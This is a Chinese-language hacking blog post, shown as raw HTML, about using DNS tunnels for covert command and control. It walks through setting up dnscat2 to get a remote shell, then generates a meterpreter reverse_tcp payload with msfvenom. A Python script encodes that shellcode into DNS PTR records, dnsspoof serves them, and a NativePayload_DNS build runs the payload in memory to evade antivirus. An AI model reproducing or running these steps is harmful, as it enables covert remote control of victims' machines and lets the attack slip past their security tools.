<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.8.0">
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="description" content="DNS Tunnel可以分为直连和中继两种。直连就是用目标机器直接和指定的目标DNS Server进行UDPsocket套接字连接，这种方式速度快，但致命的弱点就是直接将IP暴露在流量中，且如果客户端指定了信任的DNS解析服务器，那么将会被白名单限制在外。 中继是通过DNS迭代查询实现的中继隧道，生存能力强，隐蔽性更高，但同时因为数据包到达目标DNS Server前需要经过多个节点，所以速度上慢很">
<meta property="og:type" content="article">
<meta property="og:title" content="基于常规DNS隧道进行深度利用">
<meta property="og:url" content="http://yoursite.com/2019/07/01/15647421112782/index.html">
<meta property="og:site_name" content="c1y2m3’blog">
<meta property="og:description" content="DNS Tunnel可以分为直连和中继两种。直连就是用目标机器直接和指定的目标DNS Server进行UDPsocket套接字连接，这种方式速度快，但致命的弱点就是直接将IP暴露在流量中，且如果客户端指定了信任的DNS解析服务器，那么将会被白名单限制在外。 中继是通过DNS迭代查询实现的中继隧道，生存能力强，隐蔽性更高，但同时因为数据包到达目标DNS Server前需要经过多个节点，所以速度上慢很">
<meta property="og:locale" content="default">
<meta property="og:image" content="https://www.yunzhijia.com/microblog/filesvr/5d654c6628011f5f6b5e56e4">
<meta property="og:image" content="https://www.yunzhijia.com/microblog/filesvr/5d654b0590144e41c4b34961">
<meta property="og:image" content="https://www.yunzhijia.com/microblog/filesvr/5d654b2628011f5f6b5e564b">
<meta property="og:image" content="https://www.yunzhijia.com/microblog/filesvr/5d654b4990144e41c4b34984">
<meta property="og:image" content="https://www.yunzhijia.com/microblog/filesvr/5d654b7332f2ca3c6587cf34">
<meta property="og:image" content="https://www.yunzhijia.com/microblog/filesvr/5d654bcd90144e41c4b349be">
<meta property="og:image" content="https://www.yunzhijia.com/microblog/filesvr/5d654c026d67ff2f280a2cf3">
<meta property="og:image" content="https://www.yunzhijia.com/microblog/filesvr/5d654c4932f2ca3c6587cf8f">
<meta property="og:image" content="https://www.yunzhijia.com/microblog/filesvr/5d44122832f2ca7e75d5405b">
<meta property="og:image" content="https://www.yunzhijia.com/microblog/filesvr/5d4413156d67ff04fe362070">
<meta property="og:image" content="https://www.yunzhijia.com/microblog/filesvr/5d44138f90144e1859abbf23">
<meta property="og:image" content="https://www.yunzhijia.com/microblog/filesvr/5d4413fe28011f3c5371f1bb">
<meta property="og:image" content="https://www.yunzhijia.com/microblog/filesvr/5d44140128011f3c5371f1be">
<meta property="og:image" content="https://www.yunzhijia.com/microblog/filesvr/5d44144332f2ca7e75d544bf">
<meta property="og:updated_time" content="2019-08-27T15:43:29.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="基于常规DNS隧道进行深度利用">
<meta name="twitter:description" content="DNS Tunnel可以分为直连和中继两种。直连就是用目标机器直接和指定的目标DNS Server进行UDPsocket套接字连接，这种方式速度快，但致命的弱点就是直接将IP暴露在流量中，且如果客户端指定了信任的DNS解析服务器，那么将会被白名单限制在外。 中继是通过DNS迭代查询实现的中继隧道，生存能力强，隐蔽性更高，但同时因为数据包到达目标DNS Server前需要经过多个节点，所以速度上慢很">
<meta name="twitter:image" content="https://www.yunzhijia.com/microblog/filesvr/5d654c6628011f5f6b5e56e4">
    
    
        
          
              <link rel="shortcut icon" href="/c1y2m3.github.io/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/c1y2m3.github.io/images/favicon-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/c1y2m3.github.io/images/apple-touch-icon.png">
          
        
    
    <!-- title -->
    <title>基于常规DNS隧道进行深度利用</title>
    <!-- styles -->
    <link rel="stylesheet" href="/c1y2m3.github.io/css/style.css">
    <!-- persian styles -->
    
      <link rel="stylesheet" href="/c1y2m3.github.io/css/rtl.css">
    
    <!-- rss -->
    
    
</head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/c1y2m3.github.io/">主页</a></li>
         
          <li><a href="/c1y2m3.github.io/About/">关于</a></li>
         
          <li><a href="/c1y2m3.github.io/archives/">文章</a></li>
         
          <li><a href="/c1y2m3.github.io/projects_url">生活</a></li>
        
      </ul>
    </span>
    <br>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/c1y2m3.github.io/2019/07/21/TvGetpass/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" href="/c1y2m3.github.io/2019/06/27/GPP/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=http://yoursite.com/2019/07/01/15647421112782/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://yoursite.com/2019/07/01/15647421112782/&text=基于常规DNS隧道进行深度利用"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=http://yoursite.com/2019/07/01/15647421112782/&title=基于常规DNS隧道进行深度利用"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=http://yoursite.com/2019/07/01/15647421112782/&is_video=false&description=基于常规DNS隧道进行深度利用"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=基于常规DNS隧道进行深度利用&body=Check out this article: http://yoursite.com/2019/07/01/15647421112782/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=http://yoursite.com/2019/07/01/15647421112782/&title=基于常规DNS隧道进行深度利用"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=http://yoursite.com/2019/07/01/15647421112782/&title=基于常规DNS隧道进行深度利用"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=http://yoursite.com/2019/07/01/15647421112782/&title=基于常规DNS隧道进行深度利用"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=http://yoursite.com/2019/07/01/15647421112782/&title=基于常规DNS隧道进行深度利用"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=http://yoursite.com/2019/07/01/15647421112782/&name=基于常规DNS隧道进行深度利用&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#DNS-Tunnel可以分为直连和中继两种。"><span class="toc-number">1.</span> <span class="toc-text">DNS Tunnel可以分为直连和中继两种。</span></a></li></ol><li class="toc-item toc-level-1"><a class="toc-link" href="#DNSCAT2"><span class="toc-number"></span> <span class="toc-text">DNSCAT2</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#NativePayload-DNS"><span class="toc-number"></span> <span class="toc-text">NativePayload_DNS</span></a>
    </li></div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope="" itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        基于常规DNS隧道进行深度利用
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
        <span itemprop="name">c1y2m3’blog</span>
      </span>
      
    <div class="postdate">
        <time datetime="2019-07-01T15:30:00.000Z" itemprop="datePublished">2019-07-01</time>
    </div>


      

      

    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h2 id="DNS-Tunnel可以分为直连和中继两种。"><a href="#DNS-Tunnel可以分为直连和中继两种。" class="headerlink" title="DNS Tunnel可以分为直连和中继两种。"></a>DNS Tunnel可以分为直连和中继两种。</h2><p>直连就是用目标机器直接和指定的目标DNS Server进行UDPsocket套接字连接，这种方式速度快，但致命的弱点就是直接将IP暴露在流量中，且如果客户端指定了信任的DNS解析服务器，那么将会被白名单限制在外。</p>
<p>中继是通过DNS迭代查询实现的中继隧道，生存能力强，隐蔽性更高，但同时因为数据包到达目标DNS Server前需要经过多个节点，所以速度上慢很多。</p>
<p>中继过程中的一个关键点是对DNS缓存机制的规避，因为如果解析的域名在Local DNS 中已经有缓存时，Local DNS 就不会继续发送数据包。所以在构造请求中，每次查询的域名需要不同或者是已过期的。</p>
<p><img src="https://www.yunzhijia.com/microblog/filesvr/5d654c6628011f5f6b5e56e4" alt=""></p>
<h1 id="DNSCAT2"><a href="#DNSCAT2" class="headerlink" title="DNSCAT2"></a>DNSCAT2</h1><p>DNSCAT2用于通过DNS协议创建恶意软件的命令和控制通道（C＆C）。它由用Ruby编写的服务器和用C编写的客户端组成。</p>
<p>一开始，需要设置一个NS记录指向自己的子域名，再设置一个A记录指向自己部署server端的服务器地址。如下图的设置：</p>
<p><img src="https://www.yunzhijia.com/microblog/filesvr/5d654b0590144e41c4b34961" alt=""></p>
<p>解析配置完成后，在服务端nc监听下udp的53端口，再回到windows机器ping下ns域名,如果收到回显,证明解析成功。</p>
<p><img src="https://www.yunzhijia.com/microblog/filesvr/5d654b2628011f5f6b5e564b" alt=""></p>
<p>接下来，在server端开启隧道：</p>
<p>ruby./dnscat2.rb dnscat.[domain] –no-cache<br>[domain]是刚设置的ns记录的子域名，–no-cache代表不进行缓存</p>
<p><img src="https://www.yunzhijia.com/microblog/filesvr/5d654b4990144e41c4b34984" alt=""></p>
<p>我们以相同的方式启动客户端，并看到会话已经建立。</p>
<p><img src="https://www.yunzhijia.com/microblog/filesvr/5d654b7332f2ca3c6587cf34" alt=""></p>
<p>回到服务端使用shell进行命令控制:</p>
<p><img src="https://www.yunzhijia.com/microblog/filesvr/5d654bcd90144e41c4b349be" alt=""></p>
<p>在客户端抓取流量包可以看到Dnscat2 主要进行了TXT,CNAME,MX查询。</p>
<p><img src="https://www.yunzhijia.com/microblog/filesvr/5d654c026d67ff2f280a2cf3" alt=""></p>
<p>并且dnscat2客户端没有直接向我的C2服务器发送DNS查询，相反，受害者的系统正在与标准可信DNS服务器进行通信并转发至该域的权威DNS服务器，</p>
<p>正如下捕获的数据包, 受害者的本地DNS服务器正在尝试解析“dnscat.[domain].cn”域中的主机名，</p>
<p><img src="https://www.yunzhijia.com/microblog/filesvr/5d654c4932f2ca3c6587cf8f" alt=""></p>
<h1 id="NativePayload-DNS"><a href="#NativePayload-DNS" class="headerlink" title="NativePayload_DNS"></a>NativePayload_DNS</h1><p>NativePayload_DNS 是利用DNS隧道来传输shellcode，在内存中执行，进行分离免杀，躲避杀软的静态检测。</p>
<p>项目地址<br><a href="https://github.com/DamonMohammadbagher/NativePayload_DNS" target="_blank" rel="noopener">https://github.com/DamonMohammadbagher/NativePayload_DNS</a></p>
<p>这里对C#脚本使用csc.exe进行编译可执行文件exe：<br>C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out: Dnsbceon.exe NativePayload_DNS.cs</p>
<p>实现原理：<br>查看c#源代码，具体分以下三步来实现分离式免杀执行shellcode，通过循环遍历请求DNS中的PTR记录，将返回的域名进行拼接提取,最终调用kernel32申请内存执行shellcode。</p>
<p><img src="https://www.yunzhijia.com/microblog/filesvr/5d44122832f2ca7e75d5405b" alt=""></p>
<p>首先使用MSF生成shellcode,如下:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Msfvenom --platform windows --arch x64 -p windows/x64/met</span><br><span class="line">erpreter/reverse_tcp lhost=10.10.11.134 lport=4444 -f c &gt; /root/payload.txt</span><br></pre></td></tr></table></figure>
<p><img src="https://www.yunzhijia.com/microblog/filesvr/5d4413156d67ff04fe362070" alt=""></p>
<p>然后将 shellcode 制作成 IP+地址的格式<br>Ipaddress “{payload}.domain.com”<br>1.1.1.0 “0xfc0x480x830xe40xf00xe8.1.com”<br>1.1.1.1 “0xbc0xc80x130xff0x100x08.1.com”<br>……</p>
<p>这里使用python进行格式化，结果如下:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">#! /usr/bin/env python2.7</span><br><span class="line"># -*- coding:UTF-8 -*-</span><br><span class="line">a = &apos;&apos;</span><br><span class="line">f = open(&quot;payload.txt&quot;, &quot;rb&quot;)</span><br><span class="line">line = f.readlines()[0:]</span><br><span class="line">f.close()</span><br><span class="line">for lines in range(len(line)):</span><br><span class="line">    ipls = &apos;1.1.1.%s&apos; % lines</span><br><span class="line">    shellcode = line[lines].replace(&quot;;&quot;,&quot;&quot;).strip().rstrip(&apos;&quot;&apos;)+&quot;.1.com&quot;+&apos;&quot;&apos;</span><br><span class="line">    text = ipls + &quot; &quot; + &apos;&quot;&apos;+ &quot;0x&quot;+shellcode.lstrip(&apos;&quot;&apos;)</span><br><span class="line">    a += text.replace(&quot;\\&quot;,&quot;0&quot;)+&quot;\n&quot;</span><br><span class="line">fn = open(&quot;dns.txt&quot;, &quot;wb&quot;)</span><br><span class="line">fn.write(a)</span><br></pre></td></tr></table></figure>
<p><img src="https://www.yunzhijia.com/microblog/filesvr/5d44138f90144e1859abbf23" alt=""></p>
<p>在Kali上 使用dnsspoof 创建DNS服务器，并在MSF进行监听<br>dnsspoof -i eth0 -f dns.txt</p>
<p><img src="https://www.yunzhijia.com/microblog/filesvr/5d4413fe28011f3c5371f1bb" alt=""></p>
<p>通过nslookup查询可以查询到对应的shellcode</p>
<p><img src="https://www.yunzhijia.com/microblog/filesvr/5d44140128011f3c5371f1be" alt=""></p>
<p>windows执行编译好的文件，由于使用DNS反向解析，速度相对来说较慢，<br>经过漫长的等待成功弹回meterpreter。</p>
<p><img src="https://www.yunzhijia.com/microblog/filesvr/5d44144332f2ca7e75d544bf" alt=""></p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/c1y2m3.github.io/">主页</a></li>
         
          <li><a href="/c1y2m3.github.io/About/">关于</a></li>
         
          <li><a href="/c1y2m3.github.io/archives/">文章</a></li>
         
          <li><a href="/c1y2m3.github.io/projects_url">生活</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#DNS-Tunnel可以分为直连和中继两种。"><span class="toc-number">1.</span> <span class="toc-text">DNS Tunnel可以分为直连和中继两种。</span></a></li></ol><li class="toc-item toc-level-1"><a class="toc-link" href="#DNSCAT2"><span class="toc-number"></span> <span class="toc-text">DNSCAT2</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#NativePayload-DNS"><span class="toc-number"></span> <span class="toc-text">NativePayload_DNS</span></a>
    </li></div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=http://yoursite.com/2019/07/01/15647421112782/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://yoursite.com/2019/07/01/15647421112782/&text=基于常规DNS隧道进行深度利用"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=http://yoursite.com/2019/07/01/15647421112782/&title=基于常规DNS隧道进行深度利用"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=http://yoursite.com/2019/07/01/15647421112782/&is_video=false&description=基于常规DNS隧道进行深度利用"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=基于常规DNS隧道进行深度利用&body=Check out this article: http://yoursite.com/2019/07/01/15647421112782/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=http://yoursite.com/2019/07/01/15647421112782/&title=基于常规DNS隧道进行深度利用"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=http://yoursite.com/2019/07/01/15647421112782/&title=基于常规DNS隧道进行深度利用"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=http://yoursite.com/2019/07/01/15647421112782/&title=基于常规DNS隧道进行深度利用"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=http://yoursite.com/2019/07/01/15647421112782/&title=基于常规DNS隧道进行深度利用"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=http://yoursite.com/2019/07/01/15647421112782/&name=基于常规DNS隧道进行深度利用&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy; 2019 John Doe
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/c1y2m3.github.io/">主页</a></li>
         
          <li><a href="/c1y2m3.github.io/About/">关于</a></li>
         
          <li><a href="/c1y2m3.github.io/archives/">文章</a></li>
         
          <li><a href="/c1y2m3.github.io/projects_url">生活</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
</body>
</html>
<!-- styles -->
<link rel="stylesheet" href="/c1y2m3.github.io/lib/font-awesome/css/all.min.css">
<link rel="stylesheet" href="/c1y2m3.github.io/lib/justified-gallery/css/justifiedGallery.min.css">

<!-- jquery -->
<script src="/c1y2m3.github.io/lib/jquery/jquery.min.js"></script>
<script src="/c1y2m3.github.io/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>
<script src="/c1y2m3.github.io/js/main.js"></script>
<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Disqus Comments -->


